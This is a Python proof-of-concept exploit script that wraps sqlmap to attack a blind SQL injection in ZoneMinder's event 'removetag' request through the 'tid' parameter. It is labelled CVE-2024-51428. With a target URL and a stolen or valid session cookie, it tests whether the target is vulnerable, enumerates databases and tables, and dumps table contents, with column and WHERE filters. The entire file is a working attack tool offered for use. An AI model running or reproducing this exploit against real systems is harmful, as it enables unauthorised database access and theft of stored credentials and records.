#!/usr/bin/env python3
import argparse
import subprocess
import sys
def banner():
    """Print the tool's title line, padded by a blank line above and below."""
    title = "\n[+] CVE-2024-51428 Blind SQLi PoC (sqlmap wrapper)\n"
    print(title)
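def run_sqlmap(cmd):
    """Run *cmd* as a child process and echo a filtered view of its output.

    stderr is merged into stdout and the combined stream is read line by
    line. Blank lines are skipped; a line is printed only when it matches
    one of the filters below, everything else is dropped.

    Args:
        cmd: Argument list passed to ``subprocess.Popen`` (no shell is
            involved).

    Returns:
        True if at least one output line contained "Parameter:", "Type:"
        or "Payload:", otherwise False. This is a substring match on the
        tool's output, so it is a heuristic rather than a confirmation.
    """
    finding_markers = ("Parameter:", "Type:", "Payload:")
    heading_markers = (
        "available databases",
        "database:",
        "tables",
        "table:",
        "dumping",
    )
    vulnerable = False

    # The context manager closes the stdout pipe and waits for the child
    # even when the loop is left by an exception (e.g. a failing print),
    # so no pipe handle or unreaped process is left behind.
    with subprocess.Popen(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
        bufsize=1,
    ) as process:
        for line in process.stdout:
            line_clean = line.strip()
            if not line_clean:
                continue

            # Lines that report an injection finding.
            if any(marker in line_clean for marker in finding_markers):
                vulnerable = True
                print(line_clean)
                continue

            # Section headings (matched case-insensitively).
            lowered = line_clean.lower()
            if any(marker in lowered for marker in heading_markers):
                print(line_clean)
                continue

            # Items listed by the tool; the "[*] " prefix is stripped.
            if line_clean.startswith("[*]"):
                print(line_clean.replace("[*] ", ""))
                continue

            # ASCII table rows and borders. Any line with "|" or "+" passes,
            # so this filter is deliberately loose.
            if "|" in line_clean or "+" in line_clean:
                print(line_clean)
                continue

    return vulnerable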
def build_base(url, cookie):
    """Return the sqlmap argument list shared by every mode of this script.

    Args:
        url: Base URL; the request path and query string are appended to it
            unchanged, so a trailing slash on *url* is kept as given.
        cookie: Value placed after ``ZMSESSID=`` in the ``--cookie`` option.

    Returns:
        A new list of strings, starting with the ``sqlmap`` executable name.
    """
    target = f"{url}/zm/index.php?view=request&request=event&action=removetag&tid=1"
    # NOTE(review): the session cookie travels in argv, so it is readable
    # from the local process list while the child process runs.
    session = f"ZMSESSID={cookie}"

    argv = ["sqlmap"]
    argv.extend(("-u", target))
    argv.extend(("--cookie", session))
    argv.extend(("-p", "tid"))
    argv.extend(("--dbms=mysql", "--batch", "--threads=10", "--technique=T"))
    return argv
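def main():
    """Parse the command line and run the matching sqlmap invocation.

    The mode is chosen from the flag combination, checked in this order:

    * none of ``-d`` / ``-db`` / ``-t``: detection run, prints a verdict.
    * ``-d`` without ``-db``: list databases.
    * ``-d`` with ``-db`` and no ``-t``: list the tables of that database.
    * ``-t``: dump the table, optionally narrowed by ``-f`` (column) and/or
      ``-ff`` (WHERE column=value). Requires ``-db``.

    Two combinations that previously misbehaved are rejected with a usage
    error: ``-t`` without ``-db`` (a ``None`` ended up in the argument list
    and ``Popen`` raised ``TypeError``) and ``-db`` on its own (no branch
    matched and the script exited silently).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--url", required=True, help="URL objetivo")
    parser.add_argument("-c", required=True, help="Cookie ZMSESSID")
    parser.add_argument("-d", action="store_true", help="Enumerar bases de datos")
    parser.add_argument("-db", help="Base de datos objetivo")
    parser.add_argument("-t", help="Tabla objetivo")
    parser.add_argument("-f", help="Columna a mostrar")
    parser.add_argument("-ff", nargs=2, metavar=("COLUMN", "VALUE"),
                        help="Filtro WHERE columna=valor")
    args = parser.parse_args()

    banner()
    base_cmd = build_base(args.url, args.c)

    # Detection only.
    if not args.d and not args.db and not args.t:
        print("[*] Comprobando vulnerabilidad...\n")
        if run_sqlmap(base_cmd + ["-v", "1"]):
            print("\n[+] OBJETIVO VULNERABLE A BLIND SQLi\n")
        else:
            print("\n[-] No se detectó vulnerabilidad\n")
        return

    # List databases.
    if args.d and not args.db:
        print("[*] Enumerando bases de datos...\n")
        run_sqlmap(base_cmd + ["--dbs"])
        return

    # List tables of one database.
    if args.d and args.db and not args.t:
        print(f"[*] Enumerando tablas de {args.db}\n")
        run_sqlmap(base_cmd + ["-D", args.db, "--tables"])
        return

    # Dump a table.
    if args.t:
        # Unreachable with -db missing and -d set (handled above), so this
        # only fires for "-t" given without "-db".
        if not args.db:
            parser.error("-t requiere -db")

        cmd = base_cmd + ["-D", args.db, "-T", args.t]

        if args.ff:
            # WHERE filter; when -f is absent the filter column is shown.
            column, value = args.ff
            shown = args.f if args.f else column
            # NOTE(review): value is interpolated between single quotes
            # as-is, so a value containing a quote breaks the clause.
            cmd += ["-C", shown, "--where", f"{column}='{value}'", "--dump"]
        elif args.f:
            # Single column.
            cmd += ["-C", args.f, "--dump"]
        else:
            # Whole table.
            cmd += ["--dump"]

        print(f"[*] Dumpeando tabla {args.t}\n")
        run_sqlmap(cmd)
        return

    # Only "-db" without "-d" or "-t" reaches this point.
    parser.error("-db requiere -d o -t")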
# Script entry point: run main() only when executed directly, not on import.
if __name__ == "__main__":
    main()